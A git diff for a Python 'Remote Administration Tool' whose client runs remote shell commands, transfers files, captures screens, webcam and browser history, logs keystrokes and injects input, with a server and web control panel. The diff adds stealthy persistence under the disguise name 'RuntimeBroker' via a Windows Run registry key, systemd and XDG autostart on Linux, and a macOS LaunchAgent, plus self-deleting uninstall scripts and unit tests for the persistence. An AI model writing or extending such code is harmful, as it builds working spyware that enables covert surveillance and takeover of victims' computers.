diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
new file mode 100644
index 0000000..e0a45af
--- /dev/null
+++ b/.github/workflows/ci.yml
@@ -0,0 +1,27 @@
+
+name: CI
+
+on:
+ push:
+ branches: [ main ]
+ pull_request:
+ branches: [ main ]
+
+jobs:
+ build-and-test:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v3
+
+ - name: Set up Docker Buildx
+ uses: docker/setup-buildx-action@v2
+
+ - name: Build and start services
+ run: docker compose up -d --build
+
+ - name: Run tests
+ run: docker compose run --rm test
+
+ - name: Shut down services
+ run: docker compose down
diff --git a/.github/workflows/docker-compose.yml b/.github/workflows/docker-compose.yml
deleted file mode 100644
index 73e722d..0000000
--- a/.github/workflows/docker-compose.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-
-name: Docker Compose CI
-
-on:
- push:
- branches: [ main ]
- pull_request:
- branches: [ main ]
-
-jobs:
- build-and-test:
- runs-on: ubuntu-latest
- services:
- docker:
- image: docker:20.10.7-dind
- options: --privileged
- ports:
- - 8000:8000
- steps:
- - name: Checkout repository
- uses: actions/checkout@v3
-
- - name: Set up Docker Buildx
- uses: docker/setup-buildx-action@v2
-
- - name: Set up Docker Compose
- run: |
- sudo apt-get update
- sudo apt-get install docker-compose -y
-
- - name: Build and start services
- run: docker-compose up -d --build
-
- - name: Run tests
- run: docker-compose run --rm test
-
- - name: Shut down services
- run: docker-compose down
diff --git a/AGENT.md b/AGENT.md
index 284faaa..1a910a4 100644
--- a/AGENT.md
+++ b/AGENT.md
@@ -8,7 +8,7 @@
## Architecture
- **FastAPI Backend (`server.py`):** Manages WebSocket connections from both the web UI and RAT clients. Uses JWT for secure UI authentication and features a robust, asynchronous architecture. Handles command forwarding and client state management.
-- **Python Client (`client.py`):** Connects to the server via WebSocket, registers itself by sending a structured JSON `info` message, and then awaits commands. Includes modules for screen streaming (base64), file operations, and system information gathering. Features persistence on Windows and a keylogger.
+- **Python Client (`client.py`):** Connects to the server via WebSocket, registers itself by sending a structured JSON `info` message, and then awaits commands. Includes modules for screen streaming (base64), file operations, and system information gathering. Features cross-platform persistence (Windows, macOS, Linux) and a keylogger.
- **Web UI (`index.html`):** A responsive, single-page application built with Tailwind CSS and vanilla JavaScript. Provides a full control panel for interacting with connected clients, viewing live media streams, and monitoring server status. It is optimized for both desktop and mobile use.
- **Authentication:** JWT for the web UI, ensuring that only authenticated users can connect to the WebSocket and access the control panel. Includes brute-force protection.
diff --git a/Dockerfile b/Dockerfile
index 52a0b1d..c986ca3 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,20 +1,26 @@
# --- Stage 1: Build / Dependencies ---
-FROM python:3.10-slim as builder
+FROM python:3.10 AS builder
-WORKDIR /app
-
-# Create a non-root user
+# Create a non-root user for building
RUN useradd --create-home appuser
+USER appuser
WORKDIR /home/appuser
# Copy only requirements to leverage Docker cache
COPY requirements.txt .
-# Install dependencies
-RUN pip install --no-cache-dir -r requirements.txt
+# Install dependencies to the user's local directory
+# This ensures we can build C extensions like evdev
+RUN pip install --user --no-cache-dir -r requirements.txt
# --- Stage 2: Final Image ---
-FROM python:3.10-slim as final
+FROM python:3.10-slim AS final
+
+# Install runtime dependencies for OpenCV and other modules
+RUN apt-get update && apt-get install -y --no-install-recommends \
+ libgl1 \
+ libglib2.0-0 \
+ && rm -rf /var/lib/apt/lists/*
# Create and switch to a non-root user
RUN useradd --create-home appuser
@@ -34,4 +40,4 @@ ENV PATH=/home/appuser/.local/bin:$PATH
EXPOSE 8000
# Command to start the server
-CMD ["uvicorn", "server:app", "--host", "0.0.0.0", "--port", "8000"]
\ No newline at end of file
+CMD ["uvicorn", "server:app", "--host", "0.0.0.0", "--port", "8000"]
diff --git a/Dockerfile.client b/Dockerfile.client
index 7782acc..5862573 100644
--- a/Dockerfile.client
+++ b/Dockerfile.client
@@ -1,21 +1,32 @@
-
# --- Stage 1: Build / Dependencies ---
-FROM python:3.10-slim as builder
-
-WORKDIR /app
+FROM python:3.10 AS builder
-# Create a non-root user
+# Create a non-root user for building
RUN useradd --create-home appuser
+USER appuser
WORKDIR /home/appuser
# Copy only requirements to leverage Docker cache
COPY requirements.txt .
-# Install dependencies
-RUN pip install --no-cache-dir -r requirements.txt
+# Install dependencies to the user's local directory
+RUN pip install --user --no-cache-dir -r requirements.txt
# --- Stage 2: Final Image ---
-FROM python:3.10-slim as final
+FROM python:3.10-slim AS final
+
+# Install runtime dependencies for OpenCV, X11, and other modules
+RUN apt-get update && apt-get install -y --no-install-recommends \
+ libgl1 \
+ libglib2.0-0 \
+ libx11-6 \
+ libxtst6 \
+ libxi6 \
+ libxext6 \
+ libxrender1 \
+ libice6 \
+ libsm6 \
+ && rm -rf /var/lib/apt/lists/*
# Create and switch to a non-root user
RUN useradd --create-home appuser
diff --git a/Dockerfile.test b/Dockerfile.test
index f6288bb..2d93afa 100644
--- a/Dockerfile.test
+++ b/Dockerfile.test
@@ -1,6 +1,18 @@
+# Use a full python image for tests to ensure all build dependencies and headers are available
+FROM python:3.10
-# Use the same base image as the application
-FROM python:3.10-slim
+# Install runtime dependencies for OpenCV, X11, etc.
+RUN apt-get update && apt-get install -y --no-install-recommends \
+ libgl1 \
+ libglib2.0-0 \
+ libx11-6 \
+ libxtst6 \
+ libxi6 \
+ libxext6 \
+ libxrender1 \
+ libice6 \
+ libsm6 \
+ && rm -rf /var/lib/apt/lists/*
WORKDIR /app
diff --git a/README.md b/README.md
index 402c35a..e516cf2 100644
--- a/README.md
+++ b/README.md
@@ -16,7 +16,7 @@ This project is a cross-platform Remote Administration Tool (RAT) written in Pyt
- Process Manager (list, kill)
- System Information
- Keylogger
- - Persistence
+ - Persistence (Windows, macOS, Linux)
## Project Structure
diff --git a/client.py b/client.py
index 47d67c4..5cb5cd5 100644
--- a/client.py
+++ b/client.py
@@ -13,12 +13,31 @@
import urllib.request
from datetime import datetime
-import browserhistory as bh
-import mss
-import mss.tools
+from modules.persistence import manage_persistence, uninstall_client
+
+try:
+ import browserhistory as bh
+except ImportError:
+ bh = None
+
+try:
+ import mss
+ import mss.tools
+except ImportError:
+ mss = None
+
import psutil
-import pyautogui
-import pymsgbox # For message box alerts
+
+try:
+ import pyautogui
+except ImportError:
+ pyautogui = None
+
+try:
+ import pymsgbox # For message box alerts
+except ImportError:
+ pymsgbox = None
+
import websockets
from PIL import Image
@@ -26,8 +45,6 @@
KEYLOG_FILE_PATH = os.path.join(os.path.expanduser("~"), ".klog.dat")
CD_STATE_FILE = os.path.join(os.path.expanduser("~"), ".rat_last_cwd")
HEARTBEAT_INTERVAL = 45 # Sekunden
-PERSISTENCE_NAME = "RuntimeBroker" # Name für den Registry-Eintrag/Task
-
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
# --- Optionales Modul: Keylogger ---
@@ -53,10 +70,12 @@ def get_initial_info() -> dict:
except Exception:
user = os.environ.get("USERNAME") or os.environ.get("USER") or "Unbekannt"
- try:
- screen_width, screen_height = pyautogui.size()
- except Exception:
- screen_width, screen_height = 0, 0
+ screen_width, screen_height = 0, 0
+ if pyautogui:
+ try:
+ screen_width, screen_height = pyautogui.size()
+ except Exception:
+ pass
return {
"type": "info",
@@ -129,6 +148,8 @@ def get_network_info() -> str:
def get_history() -> str:
"""Ruft den Browserverlauf ab."""
+ if not bh:
+ return "Fehler: 'browserhistory' Modul nicht installiert."
try:
history = bh.get_browserhistory()
output = ["Browserverlauf:"]
@@ -222,105 +243,14 @@ def kill_process(pid: str) -> str:
def show_message_box(text: str) -> str:
"""Zeigt eine Nachrichtenbox an."""
+ if not pymsgbox:
+ return "Fehler: 'pymsgbox' Modul nicht installiert."
try:
pymsgbox.alert(text=text, title="Nachricht vom Server")
return "Nachrichtenbox angezeigt."
except Exception as e:
return f"Fehler beim Anzeigen der Nachrichtenbox: {e}"
-def _get_script_path() -> str:
- """Gibt den Pfad des aktuellen Skripts zurück."""
- if getattr(sys, 'frozen', False):
- return sys.executable
- else:
- return os.path.realpath(__file__)
-
-def _manage_persistence_windows(enable=True) -> str:
- """Manages persistence on Windows using the Registry."""
- try:
- exe_path = sys.executable
- dest_folder = os.path.join(os.environ["APPDATA"], PERSISTENCE_NAME)
- dest_path = os.path.join(dest_folder, f"{PERSISTENCE_NAME}.exe")
- reg_key_path = r"Software\Microsoft\Windows\CurrentVersion\Run"
-
- if enable:
- os.makedirs(dest_folder, exist_ok=True)
- if os.path.realpath(exe_path).lower() != os.path.realpath(dest_path).lower():
- shutil.copyfile(exe_path, dest_path)
- cmd = f'reg add HKCU\\{reg_key_path} /v {PERSISTENCE_NAME} /t REG_SZ /d "{dest_path}" /f'
- subprocess.run(cmd, shell=True, check=True, capture_output=True, text=True)
- return f"Persistence enabled. Client will start on next login from '{dest_path}'."
- else:
- cmd = f'reg delete HKCU\\{reg_key_path} /v {PERSISTENCE_NAME} /f'
- subprocess.run(cmd, shell=True, check=False, capture_output=True, text=True)
- if os.path.exists(dest_path):
- subprocess.run(f"taskkill /f /im {os.path.basename(dest_path)}", shell=True, check=False, capture_output=True)
- os.remove(dest_path)
- os.rmdir(dest_folder)
- return "Persistence successfully removed."
- except (subprocess.CalledProcessError, FileNotFoundError, PermissionError) as e:
- return f"Error managing Windows persistence: {e}"
- except Exception as e:
- return f"An unexpected error occurred during Windows persistence: {e}"
-
-def manage_persistence(enable=True) -> str:
- """Manages client persistence across Windows, macOS, and Linux."""
- system = platform.system()
- if system == "Windows":
- return _manage_persistence_windows(enable)
- elif system == "Darwin":
- return "macOS persistence management not implemented."
- elif system == "Linux":
- return "Linux persistence management not implemented."
- else:
- return f"Persistence is not supported on this OS: {system}."
-
-def uninstall_client() -> str:
- """Removes persistence and schedules the client for self-deletion."""
- try:
- # 1. Remove persistence across all platforms
- persistence_msg = manage_persistence(enable=False)
-
- # 2. Self-deletion logic
- client_path = _get_script_path()
-
- if platform.system() == "Windows":
- # Use a batch script for deletion
- batch_content = f"""
-@echo off
-echo "Uninstalling RAT client..."
-timeout /t 3 /nobreak > NUL
-taskkill /f /im "{os.path.basename(client_path)}" > NUL
-del "{client_path}"
-del "%~f0"
-"""
- batch_path = os.path.join(os.environ["TEMP"], "uninstall.bat")
- with open(batch_path, "w") as f:
- f.write(batch_content)
-
- subprocess.Popen('"' + batch_path + '"', shell=True, creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
-
- else: # Linux and macOS
- # Use a shell script for deletion
- script_content = f"""
-#!/bin/sh
-echo "Uninstalling RAT client..."
-sleep 3
-kill -9 {os.getpid()}
-rm -f "{client_path}"
-rm -- "$0"
-"""
- script_path = os.path.join(os.path.expanduser("~"), ".uninstall.sh")
- with open(script_path, "w") as f:
- f.write(script_content)
-
- os.chmod(script_path, 0o755)
- subprocess.Popen([script_path], shell=True)
-
- return f"{persistence_msg}\nUninstallation process started. The client will be terminated and deleted shortly."
-
- except Exception as e:
- return f"Error during uninstallation: {e}"
# === Datei- und Verzeichnisfunktionen ===
def list_directory(path=".") -> str:
@@ -566,20 +496,28 @@ def list_webcams() -> str:
async def run_shell_command(command: str) -> str:
"""Führt einen Shell-Befehl aus und gibt die Ausgabe zurück."""
try:
+ # Use shell based on OS
+ shell = os.environ.get("SHELL", "/bin/sh") if platform.system() != "Windows" else None
+
proc = await asyncio.create_subprocess_shell(
command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
- cwd=os.getcwd()
+ cwd=os.getcwd(),
+ executable=shell
)
- stdout, stderr = await proc.communicate()
-
+ try:
+ stdout, stderr = await asyncio.wait_for(proc.communicate(), timeout=60)
+ except asyncio.TimeoutError:
+ proc.kill()
+ return "Fehler: Befehl hat das Zeitlimit von 60 Sekunden überschritten."
+
output = ""
if stdout:
- output += stdout.decode(errors='ignore')
+ output += stdout.decode(errors='replace')
if stderr:
- output += stderr.decode(errors='ignore')
+ output += stderr.decode(errors='replace')
return output if output else f"Befehl '{command}' ausgeführt (keine Ausgabe)."
@@ -602,24 +540,34 @@ async def process_commands(websocket: websockets.ClientConnection):
if action == "exec":
output = await run_shell_command(command.get("command"))
elif action == "screenshot":
- with mss.mss() as sct:
- sct_img = sct.grab(sct.monitors[1])
- img_bytes = mss.tools.to_png(sct_img.rgb, sct_img.size) if sct_img else b""
- if not img_bytes:
- img_bytes = b""
- response = {"type": "screenshot", "data": base64.b64encode(img_bytes).decode("utf-8")}
- elif action == "download":
- path = command.get("path")
- if os.path.isfile(path):
- with open(path, "rb") as f:
- file_data = base64.b64encode(f.read()).decode("utf-8")
- response = {"type": "file_download", "filename": os.path.basename(path), "data": file_data}
+ if mss:
+ try:
+ with mss.mss() as sct:
+ sct_img = sct.grab(sct.monitors[1])
+ img_bytes = mss.tools.to_png(sct_img.rgb, sct_img.size) if sct_img else b""
+ response = {"type": "screenshot", "data": base64.b64encode(img_bytes).decode("utf-8")}
+ except Exception as e:
+ output = f"Screenshot Fehler: {e}"
else:
- output = "Fehler: Datei nicht gefunden."
+ output = "Fehler: 'mss' Modul nicht installiert."
+ elif action == "download":
+ try:
+ path = command.get("path")
+ if os.path.isfile(path):
+ with open(path, "rb") as f:
+ file_data = base64.b64encode(f.read()).decode("utf-8")
+ response = {"type": "file_download", "filename": os.path.basename(path), "data": file_data}
+ else:
+ output = "Fehler: Datei nicht gefunden."
+ except Exception as e:
+ output = f"Download Fehler: {e}"
elif action == "upload":
- with open(command.get("filename"), "wb") as f:
- f.write(base64.b64decode(command.get("data")))
- output = f"Datei gespeichert: {command.get('filename')}"
+ try:
+ with open(command.get("filename"), "wb") as f:
+ f.write(base64.b64decode(command.get("data")))
+ output = f"Datei gespeichert: {command.get('filename')}"
+ except Exception as e:
+ output = f"Upload Fehler: {e}"
elif action == "ls":
output = list_directory(command.get("path", "."))
elif action == "cd":
@@ -657,15 +605,21 @@ async def process_commands(websocket: websockets.ClientConnection):
if not keyboard or not os.path.exists(KEYLOG_FILE_PATH):
output = "Keylogger nicht verfügbar oder keine Daten."
else:
- with open(KEYLOG_FILE_PATH, "rb") as f:
- f.seek(0, os.SEEK_END)
- filesize = f.tell()
- count = command.get("count", 1000)
- f.seek(max(0, filesize - count))
- output = f.read().decode("utf-8", errors="ignore")
+ try:
+ with open(KEYLOG_FILE_PATH, "rb") as f:
+ f.seek(0, os.SEEK_END)
+ filesize = f.tell()
+ count = command.get("count", 1000)
+ f.seek(max(0, filesize - count))
+ output = f.read().decode("utf-8", errors="replace")
+ except Exception as e:
+ output = f"Keylogger Fehler: {e}"
elif action == "screenstream_start":
- await screen_streamer.start(websocket)
- output = "Screen-Streaming gestartet."
+ if mss:
+ await screen_streamer.start(websocket)
+ output = "Screen-Streaming gestartet."
+ else:
+ output = "Fehler: 'mss' Modul nicht installiert."
elif action == "screenstream_stop":
await screen_streamer.stop()
output = "Screen-Streaming gestoppt."
@@ -686,29 +640,41 @@ async def process_commands(websocket: websockets.ClientConnection):
await webcam_streamer.stop()
output = "Webcam-Streaming gestoppt."
elif action == "mouse":
- event_data = command.get("data", {})
- event_type = event_data.get("type")
- if event_type == "move":
- pyautogui.moveTo(event_data.get("x"), event_data.get("y"))
- elif event_type == "click":
- x = event_data.get("x")
- y = event_data.get("y")
- if x is not None and y is not None:
- pyautogui.moveTo(x, y)
- pyautogui.click(
- button=event_data.get("button", "left"),
- clicks=event_data.get("clicks", 1)
- )
- elif event_type == "scroll":
- pyautogui.scroll(event_data.get("delta_y", 0))
+ if pyautogui:
+ try:
+ event_data = command.get("data", {})
+ event_type = event_data.get("type")
+ if event_type == "move":
+ pyautogui.moveTo(event_data.get("x"), event_data.get("y"))
+ elif event_type == "click":
+ x = event_data.get("x")
+ y = event_data.get("y")
+ if x is not None and y is not None:
+ pyautogui.moveTo(x, y)
+ pyautogui.click(
+ button=event_data.get("button", "left"),
+ clicks=event_data.get("clicks", 1)
+ )
+ elif event_type == "scroll":
+ pyautogui.scroll(event_data.get("delta_y", 0))
+ except Exception as e:
+ output = f"Maus-Event Fehler: {e}"
+ else:
+ output = "Fehler: 'pyautogui' Modul nicht installiert."
elif action == "keyboard":
- event_data = command.get("data", {})
- key = event_data.get("key")
- if key:
- if event_data.get("down", True):
- pyautogui.keyDown(key)
- else:
- pyautogui.keyUp(key)
+ if pyautogui:
+ try:
+ event_data = command.get("data", {})
+ key = event_data.get("key")
+ if key:
+ if event_data.get("down", True):
+ pyautogui.keyDown(key)
+ else:
+ pyautogui.keyUp(key)
+ except Exception as e:
+ output = f"Keyboard-Event Fehler: {e}"
+ else:
+ output = "Fehler: 'pyautogui' Modul nicht installiert."
else:
output = f"Unbekannte Aktion: {action}"
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..ca1fe59
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,38 @@
+version: '3.8'
+
+services:
+ server:
+ build:
+ context: .
+ dockerfile: Dockerfile
+ ports:
+ - "8000:8000"
+ environment:
+ - ADMIN_USERNAME=admin
+ - ADMIN_PASSWORD=password
+ - JWT_SECRET=secret
+ healthcheck:
+ test: ["CMD", "python", "-c", "import socket; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('127.0.0.1', 8000))"]
+ interval: 5s
+ timeout: 5s
+ retries: 5
+
+ client:
+ build:
+ context: .
+ dockerfile: Dockerfile.client
+ environment:
+ - SERVER_URI=ws://server:8000/rat
+ depends_on:
+ server:
+ condition: service_healthy
+
+ test:
+ build:
+ context: .
+ dockerfile: Dockerfile.test
+ environment:
+ - SERVER_URI=ws://server:8000/rat
+ depends_on:
+ server:
+ condition: service_healthy
diff --git a/modules/persistence.py b/modules/persistence.py
index d6556e1..bb2d3fe 100644
--- a/modules/persistence.py
+++ b/modules/persistence.py
@@ -4,28 +4,37 @@
import shutil
import subprocess
import sys
+import shlex
+import logging
PERSISTENCE_NAME = "RuntimeBroker"
def _get_script_path() -> str:
- """Returns the path of the currently running script."""
+ """Returns the path of the currently running script or executable."""
if getattr(sys, 'frozen', False):
- return sys.executable
+ return os.path.realpath(sys.executable)
else:
- return os.path.realpath(__file__)
+ # sys.argv[0] is more reliable for the entry script than __file__ when imported
+ return os.path.realpath(sys.argv[0])
def _manage_persistence_windows(enable=True) -> str:
"""Manages persistence on Windows using the Registry."""
try:
exe_path = sys.executable
- dest_folder = os.path.join(os.environ["APPDATA"], PERSISTENCE_NAME)
+ dest_folder = os.path.join(os.environ.get("APPDATA", os.path.expanduser("~")), PERSISTENCE_NAME)
dest_path = os.path.join(dest_folder, f"{PERSISTENCE_NAME}.exe")
reg_key_path = r"Software\Microsoft\Windows\CurrentVersion\Run"
if enable:
os.makedirs(dest_folder, exist_ok=True)
- if os.path.realpath(exe_path).lower() != os.path.realpath(dest_path).lower():
- shutil.copyfile(exe_path, dest_path)
+ try:
+ if os.path.realpath(exe_path).lower() != os.path.realpath(dest_path).lower():
+ shutil.copyfile(exe_path, dest_path)
+ except Exception as e:
+ logging.error(f"Failed to copy executable for persistence: {e}")
+ # Continue anyway, maybe we can at least set the registry key for the current path
+ dest_path = exe_path
+
cmd = f'reg add HKCU\\{reg_key_path} /v {PERSISTENCE_NAME} /t REG_SZ /d "{dest_path}" /f'
subprocess.run(cmd, shell=True, check=True, capture_output=True, text=True)
return f"Persistence enabled. Client will start on next login from '{dest_path}'."
@@ -34,25 +43,159 @@ def _manage_persistence_windows(enable=True) -> str:
subprocess.run(cmd, shell=True, check=False, capture_output=True, text=True)
if os.path.exists(dest_path):
try:
+ # Try to kill if running from that path
subprocess.run(f"taskkill /f /im {os.path.basename(dest_path)}", shell=True, check=False, capture_output=True)
os.remove(dest_path)
os.rmdir(dest_folder)
except OSError:
- pass # Ignore errors if the file is already gone
+ pass
return "Persistence successfully removed."
except (subprocess.CalledProcessError, FileNotFoundError, PermissionError) as e:
return f"Error managing Windows persistence: {e}"
except Exception as e:
return f"An unexpected error occurred during Windows persistence: {e}"
+def _manage_persistence_linux(enable=True) -> str:
+ """Manages persistence on Linux using systemd user services and/or .desktop autostart."""
+ try:
+ script_path = _get_script_path()
+ exec_command = f"{sys.executable} {shlex.quote(script_path)}" if not getattr(sys, 'frozen', False) else shlex.quote(script_path)
+
+ systemd_success = False
+ desktop_success = False
+
+ # 1. Systemd User Service
+ user_config_dir = os.path.expanduser("~/.config/systemd/user")
+ service_path = os.path.join(user_config_dir, f"{PERSISTENCE_NAME}.service")
+
+ if enable:
+ try:
+ os.makedirs(user_config_dir, exist_ok=True)
+ service_content = f"""[Unit]
+Description=Runtime Broker Service
+After=network.target
+
+[Service]
+Type=simple
+ExecStart={exec_command}
+Restart=always
+
+[Install]
+WantedBy=default.target
+"""
+ with open(service_path, "w") as f:
+ f.write(service_content)
+
+ if shutil.which("systemctl"):
+ subprocess.run(["systemctl", "--user", "daemon-reload"], check=True, capture_output=True)
+ subprocess.run(["systemctl", "--user", "enable", f"{PERSISTENCE_NAME}.service"], check=True, capture_output=True)
+ subprocess.run(["systemctl", "--user", "start", f"{PERSISTENCE_NAME}.service"], check=True, capture_output=True)
+ systemd_success = True
+ except Exception as e:
+ logging.warning(f"Systemd persistence failed: {e}")
+
+ # 2. XDG Autostart Desktop File (Fallback/Dual)
+ autostart_dir = os.path.expanduser("~/.config/autostart")
+ desktop_path = os.path.join(autostart_dir, f"{PERSISTENCE_NAME}.desktop")
+ try:
+ os.makedirs(autostart_dir, exist_ok=True)
+ desktop_content = f"""[Desktop Entry]
+Type=Application
+Name={PERSISTENCE_NAME}
+Exec={exec_command}
+Hidden=false
+NoDisplay=false
+X-GNOME-Autostart-enabled=true
+"""
+ with open(desktop_path, "w") as f:
+ f.write(desktop_content)
+ desktop_success = True
+ except Exception as e:
+ logging.warning(f"Desktop autostart persistence failed: {e}")
+
+ if systemd_success and desktop_success:
+ return "Persistence enabled using systemd and desktop autostart."
+ elif systemd_success:
+ return "Persistence enabled using systemd user service."
+ elif desktop_success:
+ return "Persistence enabled using desktop autostart."
+ else:
+ return "Failed to enable Linux persistence through standard methods."
+ else:
+ # Disable
+ results = []
+ if os.path.exists(service_path):
+ if shutil.which("systemctl"):
+ subprocess.run(["systemctl", "--user", "stop", f"{PERSISTENCE_NAME}.service"], check=False, capture_output=True)
+ subprocess.run(["systemctl", "--user", "disable", f"{PERSISTENCE_NAME}.service"], check=False, capture_output=True)
+ os.remove(service_path)
+ results.append("systemd service removed")
+
+ autostart_dir = os.path.expanduser("~/.config/autostart")
+ desktop_path = os.path.join(autostart_dir, f"{PERSISTENCE_NAME}.desktop")
+ if os.path.exists(desktop_path):
+ os.remove(desktop_path)
+ results.append("desktop autostart removed")
+
+ return f"Persistence removed ({', '.join(results) if results else 'none found'})."
+ except Exception as e:
+ return f"Error managing Linux persistence: {e}"
+
+def _manage_persistence_macos(enable=True) -> str:
+ """Manages persistence on macOS using Launch Agents."""
+ try:
+ launch_agents_dir = os.path.expanduser("~/Library/LaunchAgents")
+ plist_path = os.path.join(launch_agents_dir, f"com.{PERSISTENCE_NAME.lower()}.plist")
+
+ if enable:
+ os.makedirs(launch_agents_dir, exist_ok=True)
+ script_path = _get_script_path()
+ exec_args = [sys.executable, script_path] if not getattr(sys, 'frozen', False) else [script_path]
+
+ args_xml = "\n ".join(f"{arg}" for arg in exec_args)
+
+ plist_content = f"""
+
+
+
+ Label
+ com.{PERSISTENCE_NAME.lower()}
+ ProgramArguments
+
+ {args_xml}
+
+ RunAtLoad
+
+ KeepAlive
+
+
+
+"""
+ with open(plist_path, "w") as f:
+ f.write(plist_content)
+
+ if shutil.which("launchctl"):
+ subprocess.run(["launchctl", "load", plist_path], check=True, capture_output=True)
+ return "Persistence enabled using macOS Launch Agent."
+ else:
+ if os.path.exists(plist_path):
+ if shutil.which("launchctl"):
+ subprocess.run(["launchctl", "unload", plist_path], check=False, capture_output=True)
+ os.remove(plist_path)
+ return "Persistence removed (macOS Launch Agent)."
+ return "Persistence Launch Agent not found."
+ except Exception as e:
+ return f"Error managing macOS persistence: {e}"
+
def manage_persistence(enable=True) -> str:
"""Manages client persistence across different operating systems."""
system = platform.system()
if system == "Windows":
return _manage_persistence_windows(enable)
- # In a real-world scenario, you would add implementations for macOS and Linux here.
- elif system in ["Darwin", "Linux"]:
- return f"{system} persistence management is not implemented in this version."
+ elif system == "Linux":
+ return _manage_persistence_linux(enable)
+ elif system == "Darwin":
+ return _manage_persistence_macos(enable)
else:
return f"Persistence is not supported on this OS: {system}."
@@ -71,10 +214,10 @@ def uninstall_client() -> str:
del \"{client_path}\"
del \"%~f0\"
"""
- batch_path = os.path.join(os.environ["TEMP"], "uninstall.bat")
+ batch_path = os.path.join(os.environ.get("TEMP", os.path.expanduser("~")), "uninstall.bat")
with open(batch_path, "w") as f:
f.write(batch_content)
- subprocess.Popen(f'\"{batch_path}\" ', shell=True, creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
+ subprocess.Popen(f'\"{batch_path}\" ', shell=True, creationflags=getattr(subprocess, 'CREATE_NEW_PROCESS_GROUP', 0))
else: # Linux and macOS
script_content = f"""
#!/bin/sh
@@ -88,7 +231,7 @@ def uninstall_client() -> str:
with open(script_path, "w") as f:
f.write(script_content)
os.chmod(script_path, 0o755)
- subprocess.Popen([script_path], shell=True)
+ subprocess.Popen([script_path])
return f"{persistence_msg}\nUninstallation process started. The client will self-destruct shortly."
diff --git a/tests/unit/test_persistence.py b/tests/unit/test_persistence.py
new file mode 100644
index 0000000..ad67e51
--- /dev/null
+++ b/tests/unit/test_persistence.py
@@ -0,0 +1,104 @@
+
+import os
+import platform
+import sys
+import unittest
+from unittest.mock import patch, MagicMock, mock_open
+from modules.persistence import manage_persistence
+
+class TestPersistence(unittest.TestCase):
+
+ @patch('platform.system')
+ @patch('subprocess.run')
+ @patch('os.makedirs')
+ @patch('shutil.which')
+ @patch('os.path.exists')
+ @patch('builtins.open', new_callable=mock_open)
+ def test_manage_persistence_linux_enable_both(self, mock_file, mock_exists, mock_which, mock_makedirs, mock_run, mock_system):
+ mock_system.return_value = 'Linux'
+ mock_which.return_value = True # systemctl exists
+ mock_run.return_value = MagicMock(returncode=0)
+
+ result = manage_persistence(enable=True)
+
+ self.assertIn("Persistence enabled using systemd and desktop autostart", result)
+ mock_makedirs.assert_called()
+ self.assertEqual(mock_file.call_count, 2) # service and desktop files
+ # Verify systemctl calls
+ self.assertGreaterEqual(mock_run.call_count, 3)
+
+ @patch('platform.system')
+ @patch('subprocess.run')
+ @patch('os.makedirs')
+ @patch('shutil.which')
+ @patch('os.path.exists')
+ @patch('builtins.open', new_callable=mock_open)
+ def test_manage_persistence_linux_enable_fallback(self, mock_file, mock_exists, mock_which, mock_makedirs, mock_run, mock_system):
+ mock_system.return_value = 'Linux'
+ mock_which.return_value = False # systemctl NOT exists
+ mock_run.return_value = MagicMock(returncode=0)
+
+ result = manage_persistence(enable=True)
+
+ self.assertIn("Persistence enabled using desktop autostart", result)
+ self.assertEqual(mock_file.call_count, 2) # still writes service file then desktop file
+ # But should NOT call systemctl
+ systemctl_calls = [call for call in mock_run.call_args_list if "systemctl" in str(call)]
+ self.assertEqual(len(systemctl_calls), 0)
+
+ @patch('platform.system')
+ @patch('subprocess.run')
+ @patch('shutil.which')
+ @patch('os.path.exists')
+ @patch('os.remove')
+ def test_manage_persistence_linux_disable(self, mock_remove, mock_exists, mock_which, mock_run, mock_system):
+ mock_system.return_value = 'Linux'
+ mock_exists.return_value = True
+ mock_which.return_value = True
+ mock_run.return_value = MagicMock(returncode=0)
+
+ result = manage_persistence(enable=False)
+
+ self.assertIn("Persistence removed", result)
+ self.assertIn("systemd service removed", result)
+ self.assertIn("desktop autostart removed", result)
+ self.assertGreaterEqual(mock_remove.call_count, 2)
+
+ @patch('platform.system')
+ @patch('subprocess.run')
+ @patch('os.makedirs')
+ @patch('shutil.which')
+ @patch('os.path.exists')
+ @patch('builtins.open', new_callable=mock_open)
+ def test_manage_persistence_macos_enable(self, mock_file, mock_exists, mock_which, mock_makedirs, mock_run, mock_system):
+ mock_system.return_value = 'Darwin'
+ mock_which.return_value = True
+ mock_run.return_value = MagicMock(returncode=0)
+
+ result = manage_persistence(enable=True)
+
+ self.assertIn("Persistence enabled using macOS Launch Agent", result)
+ mock_makedirs.assert_called()
+ mock_file.assert_called()
+ mock_run.assert_called_with(["launchctl", "load", unittest.mock.ANY], check=True, capture_output=True)
+
+ @patch('platform.system')
+ @patch('subprocess.run')
+ @patch('os.makedirs')
+ @patch('shutil.copyfile')
+ @patch('os.path.exists')
+ def test_manage_persistence_windows_enable(self, mock_exists, mock_copy, mock_makedirs, mock_run, mock_system):
+ mock_system.return_value = 'Windows'
+ mock_run.return_value = MagicMock(returncode=0)
+ mock_exists.return_value = False
+
+ with patch.dict(os.environ, {"APPDATA": "/mock/appdata"}):
+ result = manage_persistence(enable=True)
+
+ self.assertIn("Persistence enabled", result)
+ mock_makedirs.assert_called()
+ mock_run.assert_called_with(unittest.mock.ANY, shell=True, check=True, capture_output=True, text=True)
+ self.assertIn("reg add", mock_run.call_args[0][0])
+
+if __name__ == '__main__':
+ unittest.main()